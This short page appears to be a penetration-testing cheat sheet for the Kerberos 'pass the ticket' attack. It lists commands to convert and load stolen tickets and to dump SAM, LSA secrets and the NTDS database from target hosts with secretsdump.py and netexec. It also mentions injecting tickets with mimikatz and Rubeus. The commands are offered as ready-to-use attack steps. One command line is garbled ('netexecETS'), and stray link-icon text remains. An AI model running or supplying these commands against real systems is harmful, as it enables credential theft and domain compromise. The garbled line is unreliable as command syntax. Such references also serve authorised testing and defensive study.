Pass The Ticket

Ticket conversion


# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache

# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi

Linux

Exporting ticket

export KRB5CCNAME=$path_to_ticket.ccache

Export hashes

secretsdump.py -k $TARGET

netexec smb $TARGETS -k --sam
netexec smb $TARGETS -k --lsa
netexecETS -k --ntds

Command execution

Windows

The most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatzarrow-up-right and Rubeusarrow-up-right accept this flag.

Last updated